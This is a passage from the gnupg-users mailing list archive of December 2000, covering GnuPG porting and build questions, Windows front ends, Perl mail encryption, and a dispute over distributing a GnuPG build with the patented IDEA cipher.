I'll try to > ask the community: Is there an AS/ 400 version of GnuPG or did anyone ever > try to compile/ release a version for this platform? I looked, and never found anything. have you tried to compile it? I don't know much about the AS/400 platform, but I think there are compilers for it. However, I don't know if it would be trivial to compile... - -- Brian Minton minton@csc.smsu.edu Caution: in case of rapture, this computer will be unoccupied! PGP 0xE177AFF0 fingerprint AB94 E395 78CE 0967 2542 A7B3 178C 3E66 E177 AFF0 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6Q41np0PPDCS0QgIRAsE5AJ41D9Az3RFu/FALDeyRyyikcEJbpACeMdMU 7kT3mhFLVttJQiTs4vCX9HA= =So2c -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From ed@eepatents.com Fri Dec 22 18:25:31 2000 From: ed@eepatents.com (Ed Suominen) Date: Fri, 22 Dec 2000 11:25:31 -0700 Subject: Unidentified subject! Message-ID: <5.0.2.1.0.20001222112404.029187d0@maia.netsonic.net> My apologies for posting incorrect URLs to WinGPG. The correct ones are: Installation file: ftp://eepatents.com/clients/wingpg-v1-00.exe ZIP archive for browsing individual files: ftp://eepatents.com/clients/wingpg-v1-00.zip I would appreciate any comments (positive and negative alike) from those who find the installation package (and the enclosed user's guide and passphrase selection worksheet) useful. Please copy Timo Schulz, the author of WinPT, at mailto:twoaday@freakmail.de. Ed Suominen Registered Patent Agent Web Site: http://eepatents.com PGP Public Key: http://eepatents.com/key -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Fri Dec 22 19:20:25 2000 From: wk@gnupg.org (Werner Koch) Date: Fri, 22 Dec 2000 20:20:25 +0100 Subject: Answer??? (was: Question!!!) In-Reply-To: <4512.001222@intes.odessa.ua>; from mslava@intes.odessa.ua on Fri, Dec 22, 2000 at 12:19:07PM +0000 References: <4512.001222@intes.odessa.ua> Message-ID: <20001222202025.H32206@gnupg.de> On Fri, 22 Dec 2000, Slava Moiseev wrote: > Hello, I need to use gnupg under Win 98/NT and Linux(Red Hat). > I sign and encrypt my data under Windows NT, but when I try to > decrypt it under Linux I don't get my data. Gnupg gives Invalid What version of GnuPG are you using uner GNU/Linux? If it is less than 1.0.3 you have to upgrade. See the FAQ. Another workaround is to do a echo "disable-cipher-algo twofish" >>c:\\gnupg\options Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Fri Dec 22 19:08:07 2000 From: wk@gnupg.org (Werner Koch) Date: Fri, 22 Dec 2000 20:08:07 +0100 Subject: AS/ 400 version? In-Reply-To: <20001222112048.A20866@aspirin.smsu.edu>; from minton@csc.smsu.edu on Fri, Dec 22, 2000 at 11:20:49AM -0600 References: <000901c06a6a$d4a0f5d0$2bf8ae8b@bert> <20001222112048.A20866@aspirin.smsu.edu> Message-ID: <20001222200807.E32206@gnupg.de> On Fri, 22 Dec 2000, Brian Minton wrote: > I looked, and never found anything. have you tried to compile it? I don't > know much about the AS/400 platform, but I think there are compilers for it. I used to know the /38 but at the time of the /400 I ahve moved to other platforms :-) If the AS/400 has a Posix subsystem, you can make GnuPG work on it. It should also be possible to make it work on non-posix platforms - there is a Windoze and VMS version. The big problem, is on how to get the entropy for the RNG. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Fri Dec 22 19:13:39 2000 From: wk@gnupg.org (Werner Koch) Date: Fri, 22 Dec 2000 20:13:39 +0100 Subject: Fwd: LSLID:2000122005 - RedHat - GnuPG - RHSA-2000:131-02 In-Reply-To: <00122120295801.15261@bluesman.drb.net>; from dbergst@phoenixdsl.com on Thu, Dec 21, 2000 at 08:29:58PM -0500 References: <00122120295801.15261@bluesman.drb.net> Message-ID: <20001222201339.F32206@gnupg.de> On Thu, 21 Dec 2000, David R. Bergstein wrote: > Can anyone comment on this recent security advisory, and whether any of > RedHat's patches have been submitted to the gnupg cvs? It is probably the same patch that I worked out with SuSE and Caldera. I don't think that I am able to release 1.0.5 this year. A lot of minor stuff has to be applied and I would like to make sure that 1.0.5 works fine with gpgme, most patches are included and well tested on several platforms. I will also give the translators some time to catch up before a release is done. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Fri Dec 22 19:27:39 2000 From: wk@gnupg.org (Werner Koch) Date: Fri, 22 Dec 2000 20:27:39 +0100 Subject: Test failure on NetBSD In-Reply-To: <20001222170608.A12051@nmrc.ie>; from lhecking@nmrc.ie on Fri, Dec 22, 2000 at 05:06:08PM +0000 References: <20001218150453.A23106@nmrc.ie> <20001222170608.A12051@nmrc.ie> Message-ID: <20001222202739.I32206@gnupg.de> On Fri, 22 Dec 2000, Lars Hecking wrote: > All I wrote applies equally to OpenBSD (2.8). I suspect that this is a > BSD dd specific issue, never having observed this on Solaris, DU etc. It has been fixed in the CVS. > Also, the following mini-patch eliminates a (harmless :) compiler warning. > I'm not familiar at all with NLS, it may be better to ifdef this line and > add the corresponding configure test. I have found no reference for langinfo (IIRC, someone sent me the Sun man page), so I can't decided whether this is correct. glibc includes nl_types -w hich is what a Posix header file should do anyway. If it is a OpenBSD bug, it should be fixed there so that we don't need to make the configure file larger than the entire program. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From bill@bcswebco.com Fri Dec 22 20:04:45 2000 From: bill@bcswebco.com (Bill) Date: Fri, 22 Dec 2000 14:04:45 -0600 Subject: Installing on a Virtual Host Message-ID: Hi - We are trying to install GPG on a site that is virtual hosted (Linux Redhat system). We do not have access to the root and wish install in the assigned directory - /home above the /www. 1. Can this be done? 2. If so, are there any links to sites/pages that can explain how to install this way. Please CC a reply to bill@bcswebco.com - we are not subscribed to this mailing list Thanks in advance and Happy Holidays to all!! -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rich@cnylug.org Fri Dec 22 22:36:13 2000 From: rich@cnylug.org (Rich) Date: Fri, 22 Dec 2000 17:36:13 -0500 Subject: Module code added to GnuPG? Message-ID: <3A43D75D12C.1D02RICH@mail.dreamscape.com> I saw this on the usenet a moment ago and didn't notice it posted to this group yet when I looked on lists.gnupg.org so I thought I'd cut and paste it into here from that group in case he hadn't. -------------------- Subject: GnuPG + IDEA for windows, now with Mingw32 >From: Disastry@saiknes.lv.NOSPAM.NET Newsgroups: alt.security.pgp -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 well, I finally installed MingW32 on linux and compiled GnuPG for Windows and modified one file (cipher/dynload.c) so that GnuPG now can load extension modules, including IDEA. (was very easy) go get patch, compiled executable and IDEA.dll here: http://disastry.dhs.org/pgp == == Disastry http://i.am/disastry/ http://disastry.dhs.org/pgp <-- PGP plugins for Netscape and MDaemon remove .NOSPAM.NET for email reply -----BEGIN PGP SIGNATURE----- Version: Netscape PGP half-Plugin 0.14 by Disastry / PGPsdk v1.7.1 iQA/AwUBOkNlOTBaTVEuJQxkEQLpnACg12uecXWTSblGqbMbUzNyraozp1cAn0Eu HSEfxGC5gg/E3+KWNrK7PTsH =OK4S -----END PGP SIGNATURE----- -------------------- Rich... ________________________________________ The Central New York Linux User Group Now with one of them web page thingies! www.cnylug.org <-> rich@XXXcnylug.org -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From npolys@virtuworlds.com Fri Dec 22 21:44:34 2000 From: npolys@virtuworlds.com (Nicholas F. Polys) Date: Fri, 22 Dec 2000 21:44:34 -0000 Subject: embedding gpg for pgp compliant mail Message-ID: <01c06c60$5fdf64f0$fa6ddbd0@jahbepraised> Howdy all, does this sound familiar? web Form -> encryption ->email -> pgp mail front end (mac/pc) I am trying to write gpg encrypted data into a mail message for a pgp user. It is using a PGP generated public key which is imported and signed. I am using a public key which encrypts fine when working with local files. I've come up with a perl script that works similarly to PGPMail/formail: I open a couple of filehandles and print the temp file's contents into the body of the mail. the problem is, even with the same parameter calls, it is ending up writing in strange characters that are not recognized by pgp or similar to the local file encryption. I wonder if i am omitting any body headers or something? can anyone help? "|/gpg/location/gpg --output $gpgtmp --cipher-algo 3des --quiet --textmode --recipient $CONFIG{'pgpuserid'} --encrypt $Form_info" options file (compiled from clemen's thread): force-v3-sigs honor-http-proxy disable-pubkey-algo ELG disable-cipher-algo blowfish s2k-cipher-algo cast5 digest-algo sha1 compress-algo 1 no-secmem-warning lock-once escape-from-lines thanks and hippy holidays! all the best, _nick -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From npolys@virtuworlds.com Sat Dec 23 01:30:00 2000 From: npolys@virtuworlds.com (Nicholas F. Polys) Date: Sat, 23 Dec 2000 01:30:00 -0000 Subject: embedding gpg for pgp compliant mail Message-ID: <01c06c7f$dda999e0$d96ddbd0@jahbepraised> oh you mean the ascii-armor option, -a ? thanks, sorry for wasting bandwidth... pax max ! _nick -----Original Message----- From: Nicholas F. Polys To: gnupg-users@gnupg.org Date: Saturday, December 23, 2000 3:00 AM Subject: embedding gpg for pgp compliant mail >Howdy all, > >does this sound familiar? >web Form -> encryption ->email -> pgp mail front end (mac/pc) > > I am trying to write gpg encrypted data into a mail message for a pgp >user. >It is using a PGP generated public key which is imported and signed. > >I am using a public key which encrypts fine when working with local files. >I've come up with a perl script that works similarly to PGPMail/formail: >I open a couple of filehandles and print the temp file's contents into the >body of the mail. > >the problem is, even with the same parameter calls, it is ending up writing >in strange characters that are not recognized by pgp or similar to the local >file encryption. > >I wonder if i am omitting any body headers or something? >can anyone help? > > >"|/gpg/location/gpg --output $gpgtmp --cipher-algo >3des --quiet --textmode --recipient $CONFIG{'pgpuserid'} --encrypt >$Form_info" > >options file (compiled from clemen's thread): > >force-v3-sigs >honor-http-proxy >disable-pubkey-algo ELG >disable-cipher-algo blowfish >s2k-cipher-algo cast5 >digest-algo sha1 >compress-algo 1 >no-secmem-warning >lock-once >escape-from-lines > >thanks and hippy holidays! > >all the best, >_nick > > >-- >Archive is at http://lists.gnupg.org - Unsubscribe by sending mail >with a subject of "unsubscribe" to gnupg-users-request@gnupg.org > -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Sat Dec 23 11:38:12 2000 From: wk@gnupg.org (Werner Koch) Date: Sat, 23 Dec 2000 12:38:12 +0100 Subject: Module code added to GnuPG? In-Reply-To: <3A43D75D12C.1D02RICH@mail.dreamscape.com>; from rich@cnylug.org on Fri, Dec 22, 2000 at 05:36:13PM -0500 References: <3A43D75D12C.1D02RICH@mail.dreamscape.com> Message-ID: <20001223123812.M32206@gnupg.de> On Fri, 22 Dec 2000, Rich wrote: > I saw this on the usenet a moment ago and didn't notice it posted > to this group yet when I looked on lists.gnupg.org so I thought I'd > cut and paste it into here from that group in case he hadn't. It will be in the next release. It is already in the code but I need to make it work nicer with the configuration system. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From fw@deneb.enyo.de Sat Dec 23 12:50:58 2000 From: fw@deneb.enyo.de (Florian Weimer) Date: 23 Dec 2000 13:50:58 +0100 Subject: Test failure on NetBSD In-Reply-To: <20001222170608.A12051@nmrc.ie> References: <20001218150453.A23106@nmrc.ie> <20001222170608.A12051@nmrc.ie> Message-ID: <87elyz5mj1.fsf@deneb.enyo.de> Lars Hecking writes: > Also, the following mini-patch eliminates a (harmless :) compiler warning. > I'm not familiar at all with NLS, it may be better to ifdef this line and > add the corresponding configure test. Could you tell us the warning? miscutil.c doesn't use anything which is normally declared or defined in . -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lhecking@nmrc.ie Sat Dec 23 15:49:12 2000 From: lhecking@nmrc.ie (Lars Hecking) Date: Sat, 23 Dec 2000 15:49:12 +0000 Subject: Test failure on NetBSD In-Reply-To: <20001222202739.I32206@gnupg.de>; from wk@gnupg.org on Fri, Dec 22, 2000 at 08:27:39PM +0100 References: <20001218150453.A23106@nmrc.ie> <20001222170608.A12051@nmrc.ie> <20001222202739.I32206@gnupg.de> Message-ID: <20001223154912.A21721@nmrc.ie> > > All I wrote applies equally to OpenBSD (2.8). I suspect that this is a > > BSD dd specific issue, never having observed this on Solaris, DU etc. > > It has been fixed in the CVS. Thanks! > I have found no reference for langinfo (IIRC, someone sent me the > Sun man page), so I can't decided whether this is correct. glibc > includes nl_types -w hich is what a Posix header file should do > anyway. If it is a OpenBSD bug, it should be fixed there so that we > don't need to make the configure file larger than the entire program. You are probably right. I found that Solaris' langinfo.h includes nl_types, and I've asked Marc to add it in OBSD, too. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lhecking@nmrc.ie Sat Dec 23 16:30:21 2000 From: lhecking@nmrc.ie (Lars Hecking) Date: Sat, 23 Dec 2000 16:30:21 +0000 Subject: Test failure on NetBSD In-Reply-To: <87elyz5mj1.fsf@deneb.enyo.de>; from fw@deneb.enyo.de on Sat, Dec 23, 2000 at 01:50:58PM +0100 References: <20001218150453.A23106@nmrc.ie> <20001222170608.A12051@nmrc.ie> <87elyz5mj1.fsf@deneb.enyo.de> Message-ID: <20001223163021.C21721@nmrc.ie> Florian Weimer writes: > Lars Hecking writes: > > > Also, the following mini-patch eliminates a (harmless :) compiler warning. > > I'm not familiar at all with NLS, it may be better to ifdef this line and > > add the corresponding configure test. > > Could you tell us the warning? miscutil.c doesn't use anything which > is normally declared or defined in . I don't recall the exact warning message, and it's harmless anyway. char *nl_langinfo __P((nl_item)); The compiler thinks that nl_item is a parameter name, but it's really a type defined in nl_types.h. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From aphex@nullify.org Sat Dec 23 20:06:41 2000 From: aphex@nullify.org (Keith Ray) Date: Sat, 23 Dec 2000 14:06:41 -0600 (CST) Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: <20001218140534.E12265@gnupg.de> References: <976900291.3a3a50c3ac947@nullify.org> <20001218140534.E12265@gnupg.de> Message-ID: <977602001.3a4505d13e702@nullify.org> Quoting Werner Koch : > On Fri, 15 Dec 2000, Keith Ray wrote: > > > I have been able to successfully cross-compile GnuPG 1.0.4-1 to > include the > > IDEA cipher for Windows. Since this binary now includes both RSA and > IDEA, it > > should be fully backwards compatible with PGP 2.6.x. > > > > The following changes were made from a "standard" cross-compile: > > 1. Statically linked idea.c. Unlike Cygwin, this release requires no > DLLs. > > By releasing this software you are violating the GPL: > Can I get a cease-and-desist letter on FSF letterhead, please? -------------------------------------------------------------------- Keith Ray aphex@nullify.org http://www.nullify.org PGP - 0xAE1B3529 - 8227 60E5 BAA5 9461 CAB3 A6F2 4DFE F573 AE1B 3529 -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From evangelo@pigdog.org Sun Dec 24 03:22:22 2000 From: evangelo@pigdog.org (ESP) Date: 23 Dec 2000 19:22:22 -0800 Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: Keith Ray's message of "Sat, 23 Dec 2000 14:06:41 -0600 (CST)" References: <976900291.3a3a50c3ac947@nullify.org> <20001218140534.E12265@gnupg.de> <977602001.3a4505d13e702@nullify.org> Message-ID: <87zohm7bbl.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> >>>>> "KR" == Keith Ray writes: KR> Can I get a cease-and-desist letter on FSF letterhead, please? Why waste everybody's time and be a humongous dickhead? You know now why IDEA was not included in GnuPG, you're doing something that is going to draw lightning to yourself and GnuPG eventually, and there's no good reason for it. Do you have a point you're trying to prove? Like, "Screw you for making this nice program for me."? "Go to hell, FSF and Werner Koch, for having thought through the issues about GnuPG and IDEA much more than I have."? I can't really see one. There's not some Goliath here that you can play David to, man. Please act like an adult and take down your binary. ~ESP -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ESP | http://pigdog.org/ "Fan belts break at 3AM. I get mad, drinks get spilled." ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From peter@palfrader.org Fri Dec 22 22:20:55 2000 From: peter@palfrader.org (Peter Palfrader) Date: Fri, 22 Dec 2000 23:20:55 +0100 Subject: majordomo? In-Reply-To: <20001214204456.R23140@gnupg.de>; from wk@gnupg.org on Thu, Dec 14, 2000 at 20:44:56 +0100 References: <3A391962208.0E19RICH@mail.dreamscape.com> <20001214204456.R23140@gnupg.de> Message-ID: <20001222232055.A3869@marvin.palfrader.org> --/9DWx/yDrRhgMJTb Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Hi Werner! On Thu, 14 Dec 2000, Werner Koch wrote: > On Thu, 14 Dec 2000, Rich wrote: >=20 > > Is majordomo@gnupg.org working? >=20 > I hope not. There should be no majordomo but a smartlist thing. I > thing I removed the autoresponder which told users, that there is no > Majordomo. IIRC the Debian Project also uses smartlist and Joey[1] (or someone else) hacked up a majordomo -> smartlist translator so that commands to majordomo@d.o work as expected. Maybe this could be installed on gnupg.org too? yours, peter 1. joey@debian.org --=20 PGP signed and encrypted messages preferred. http://www.palfrader.org/ --/9DWx/yDrRhgMJTb Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6Q9PH3nqvbpTAnH8RAsNfAKCGuN8XoZ0acamdC6m7h9b+IxZBawCgptvP E/Yp+zkn0Y6YVkXQYNA6Vqc= =MOqq -----END PGP SIGNATURE----- --/9DWx/yDrRhgMJTb-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From aphex@nullify.org Sun Dec 24 07:18:04 2000 From: aphex@nullify.org (Keith Ray) Date: Sun, 24 Dec 2000 01:18:04 -0600 (CST) Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: <87zohm7bbl.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> References: <976900291.3a3a50c3ac947@nullify.org> <20001218140534.E12265@gnupg.de> <977602001.3a4505d13e702@nullify.org> <87zohm7bbl.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> Message-ID: <977642284.3a45a32c931d3@nullify.org> Quoting ESP : > >>>>> "KR" == Keith Ray writes: > > KR> Can I get a cease-and-desist letter on FSF letterhead, please? > > Why waste everybody's time and be a humongous dickhead? You know now > why IDEA was not included in GnuPG, you're doing something that is > going to draw lightning to yourself and GnuPG eventually, and there's > no good reason for it. I guess that's why no one has EVER asked for an IDEA capable Windows version? I guess there are no Windows users who might want to communicate with PGP 2.6x users or use most remailers? > Do you have a point you're trying to prove? Like, "Screw you for > making this nice program for me."? "Go to hell, FSF and Werner Koch, > for having thought through the issues about GnuPG and IDEA much more > than I have."? I can't really see one. I am not trying to prove a point. I merely wish to allow those who want a GnuPG+IDEA binary to be able to have one. I give it away free and provide source. Isn't that the point of Free Software? If commercial users don't want it, they can download the official release. But for all noncommercial users, there is NO reason why they shouldn't be able to have IDEA support. > There's not some Goliath here that you can play David to, man. Please > act like an adult and take down your binary. The no patents clause of the GPL is stupid! Why can't we provide TWO versions and let the users decide which best meets there needs? The unix users have had this choice for some time, why are the Window's users less deserving? I am not taking anything away from Werner or anyone else. So it's real simple. Either leave me alone and let the users decide which version they want, or force me to stop. I am not trying to steal anyone's work or make money off it. I am merely adding some much requested functionality. -------------------------------------------------------------------- Keith Ray aphex@nullify.org http://www.nullify.org PGP - 0xAE1B3529 - 8227 60E5 BAA5 9461 CAB3 A6F2 4DFE F573 AE1B 3529 -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From graham@todd276.worldonline.co.uk Sun Dec 24 08:59:54 2000 From: graham@todd276.worldonline.co.uk (Graham) Date: Sun, 24 Dec 2000 08:59:54 GMT Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: <977642284.3a45a32c931d3@nullify.org> References: <87zohm7bbl.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> <977642284.3a45a32c931d3@nullify.org> Message-ID: <20001224083816.75F5.GRAHAM@todd276.worldonline.co.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi there, Keith Ray, On 24 December 2000, I received the following message from you regarding "GnuPG 1.0.4-1 + IDEA for Windows" KR> I guess that's why no one has EVER asked for an IDEA capable Windows version? KR> I guess there are no Windows users who might want to communicate with PGP 2.6x KR> users or use most remailers? As a Windows user of GnuPG, I use PGP 2.6.3ai to access remailers, as well as running GnuPG. The PGP 2.6.3ai keyring contains mainly remailers (this keeps them off my main keyring). I use Windows front ends for both GnuPG and PGP 2.6.3ai, and if GnuPG fails to decrypt/verify, I use PGP 2.6.3ai. For convenience, it would be nice if GnuPG could be used for this purpose, but it would mean importing my remailer list into my GnuPG keyring, so not much would be saved by my doing this. KR> > Do you have a point you're trying to prove? Like, "Screw you for KR> > making this nice program for me."? "Go to hell, FSF and Werner Koch, KR> > for having thought through the issues about GnuPG and IDEA much more KR> > than I have."? I can't really see one. KR> KR> I am not trying to prove a point. I merely wish to allow those who want a KR> GnuPG+IDEA binary to be able to have one. I give it away free and provide KR> source. Isn't that the point of Free Software? If commercial users don't want KR> it, they can download the official release. But for all noncommercial users, KR> there is NO reason why they shouldn't be able to have IDEA support. I agree, but perhaps the way forward is for the Windows version to be placed on the same level as the Linux version, and the IDEA support should be an "official" plug-in for non-commercial use only. Until we have a fully functional GnuPG with a GUI similar to NAI's, GnuPG is going to be a Windows backwater...unfortunately. KR> > There's not some Goliath here that you can play David to, man. Please KR> > act like an adult and take down your binary. KR> KR> The no patents clause of the GPL is stupid! Why can't we provide TWO versions KR> and let the users decide which best meets there needs? The unix users have had KR> this choice for some time, why are the Window's users less deserving? I am not KR> taking anything away from Werner or anyone else. KR> KR> So it's real simple. Either leave me alone and let the users decide which KR> version they want, or force me to stop. I am not trying to steal anyone's work KR> or make money off it. I am merely adding some much requested functionality. Again, I agree, but see my comments above. GnuPG needs to be more Windows-friendly, and I feel that Windows OS is being supported almost as an afterthought (I mean no disrespect to Werner here). First, we need a GUI that rivals PGP *without* recourse to the command line, as this will make more Windows users look at the undoubted merits (even superiority) of GnuPG. Secondly, we need full keyserver support through that GUI. Finally, we need IDEA support as an official plug-in, as with Linux. Any chance of any of these occurring soon....? Graham reply to: graham@todd276.worldonline.co.uk Please PGP/GnuPG sign mail for verification and encrypt for internet security Written on 24 December 2000 08:38:16 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4-1 (MingW32) Comment: For info see http://www.gnupg.org iD8DBQE6Rbr8LuLY+pnbEL0RAvwUAJ91iGKrSweVaYITllgz3Vkt4Dq2YgCgnqm1 Xu5Hm1UyknoR/kTB2IDnCu8= =rcF1 -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Sun Dec 24 11:44:03 2000 From: wk@gnupg.org (Werner Koch) Date: Sun, 24 Dec 2000 12:44:03 +0100 Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: <20001224083816.75F5.GRAHAM@todd276.worldonline.co.uk>; from graham@todd276.worldonline.co.uk on Sun, Dec 24, 2000 at 08:59:54AM +0000 References: <87zohm7bbl.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> <977642284.3a45a32c931d3@nullify.org> <20001224083816.75F5.GRAHAM@todd276.worldonline.co.uk> Message-ID: <20001224124403.Q32206@gnupg.de> On Sun, 24 Dec 2000, Graham wrote: > Again, I agree, but see my comments above. GnuPG needs to be more > Windows-friendly, and I feel that Windows OS is being supported almost > as an afterthought (I mean no disrespect to Werner here). First, we No. I am very used to write portable programs and if you look at the source, there is not much difference between the Windows and the GNU source code. I have decided to use GTK+ to write GUI, so that it can be be easly "ported" to Windows. And actually it was really easy in the beginning. Later it turned out that some subtle problems with piping under Windows have to be solved and I hope I did this meanwhile with GPGME. So, there is just one source code. Timo's WinPT is a pretty nice tools wich is moving repidly forward and we will soon have something similiar to NAI's PGP. A nice installer should be ready in early January. > superiority) of GnuPG. Secondly, we need full keyserver support TIMO has implemnted this in WinPT and doing that for GnuPG is just some minor (but boring) coding. I'll do this as soon as I find the time for it or someone contributes the changes (hint, hint). > through that GUI. Finally, we need IDEA support as an official plug-in, am not going to distribuite it, but I already promised that the extension mechanism will work in th next version and you can already find the pacthes inthe ML archive. With the extension stuff, we have the same situation as under Unix and so this "problem" should go away. BTW, I am hacking on Sylpheed (a very nice grahical MUA) and I have some reason to believe that I can port it to Windows (I can already run it and set the preferences). Then you will have a real nice Windows MUA with full MIME support. Another chance for a nice MUA is Mahogany; the only problem I see is that it uses the plain Artistic license and we are not sure whether it is really a free license and compatible to the GPL - we have asked the authors, but they didn't respond. These MUAs are just a temporary solution until we are ready to bring full support to Outlook. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From johanw@vulcan.xs4all.nl Sun Dec 24 13:01:28 2000 From: johanw@vulcan.xs4all.nl (Johan Wevers) Date: Sun, 24 Dec 2000 14:01:28 +0100 (MET) Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: <87zohm7bbl.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> from ESP at "Dec 23, 2000 07:22:22 pm" Message-ID: <200012241301.OAA02521@vulcan.xs4all.nl> ESP wrote to Keith Ray: > Why waste everybody's time and be a humongous dickhead? You know now > why IDEA was not included in GnuPG, you're doing something that is > going to draw lightning to yourself and GnuPG eventually, and there's > no good reason for it. I just read the patent issue in the GPL. I'm not sure how this is supposed to work, it doesn't say anything about where the patent need to be acknowledged for example. I'm asking because software patents are (fortunately) not given in the EC, recently they turned down a proposal from the patent lobby to do so. If, say, some obscure dictator in some banana republic claims that all public-key crypto is patented to him in that country, would that formally exclude any public-key crypto from being distributed under the GPL? BTW, the same situation exists with the gif format: the claimed patent does not hold in many countries, like mine. I'm not sure about the IDEA patent, but I don't feel like obeying the stupid laws of other countries when I'm not there. > Do you have a point you're trying to prove? Like, "Screw you for > making this nice program for me."? I don't think so, I think Keith can do something and get away with it that could cause Werner, in his position, serious problems. If Werner can proove to any patent-claimers that he isn't involved with Keith's version his ass is covered. -- ir. J.C.A. Wevers // Physics and science fiction site: johanw@vulcan.xs4all.nl // http://www.xs4all.nl/~johanw/index.html PGP/GPG public keys at http://www.xs4all.nl/~johanw/pgpkeys.html -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From graham@todd276.worldonline.co.uk Sun Dec 24 15:23:00 2000 From: graham@todd276.worldonline.co.uk (Graham) Date: Sun, 24 Dec 2000 15:23:00 GMT Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: <20001224124403.Q32206@gnupg.de> References: <20001224083816.75F5.GRAHAM@todd276.worldonline.co.uk> <20001224124403.Q32206@gnupg.de> Message-ID: <20001224151200.BD90.GRAHAM@todd276.worldonline.co.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi there, Werner, On 24 December 2000, I received the following message from you regarding "GnuPG 1.0.4-1 + IDEA for Windows" Thank you for the detailed explanation...and I hope something materialises soon, as you are obviously doing a great job, Werner. Yes, I agree about Timo's GUI...its coming along really well. All power to his elbow! WK>These MUAs are just a temporary solution until WK> we are ready to bring full support to Outlook. To Outlook? Well, I guess you must start somewhere, but Outlook and Outlook Express are generally reckoned to be the vehicles for the carriers of so many viruses under Windows, that I hope full support will come in the way of plug-ins which will interface GnuPG with MUAs other than the Microsoft apps and Eudora..... Again, please accept my thanks for all the help you have given me and other Windows users in 2000..... and I wish you and your family a Merry Christmas and a productive New Year! Graham reply to: graham@todd276.worldonline.co.uk Please PGP/GnuPG sign mail for verification and encrypt for internet security Written on 24 December 2000 15:12:00 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4-1 (MingW32) Comment: Please use my key ID: 0x99DB10BD iD8DBQE6RhTGLuLY+pnbEL0RAjSIAKCe3VRlpoCpWMJpdeu9tboMrDifWwCg/YzR a/pTGFdUTiE6S8dlEErokgyIPwMFATpGFMYu4tj6mdsQvRECNIgAnR9DY998B6VL Xe7oic2pxTfdVhozAKDoYA7VQDAp5vTiVcos3W4kN5q6Rg== =QIVt -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rich@cnylug.org Sun Dec 24 15:53:33 2000 From: rich@cnylug.org (Rich) Date: Sun, 24 Dec 2000 10:53:33 -0500 Subject: GnuPG 1.0.4-1 + IDEA for Windows and more In-Reply-To: References: <20001224124403.Q32206@gnupg.de> Message-ID: <3A461BFD230.3414RICH@mail.dreamscape.com> Well, now that Werner has added the code that allows the Win32 version to 